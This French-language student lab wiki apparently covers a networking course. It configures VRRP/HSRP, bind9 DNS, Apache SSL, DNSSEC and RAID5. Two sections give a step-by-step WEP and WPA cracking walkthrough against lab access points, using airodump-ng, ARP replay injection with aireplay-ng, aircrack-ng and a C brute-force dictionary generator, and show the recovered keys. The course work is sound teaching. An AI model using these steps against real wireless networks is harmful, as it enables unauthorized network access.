=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;A AJOUTER&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
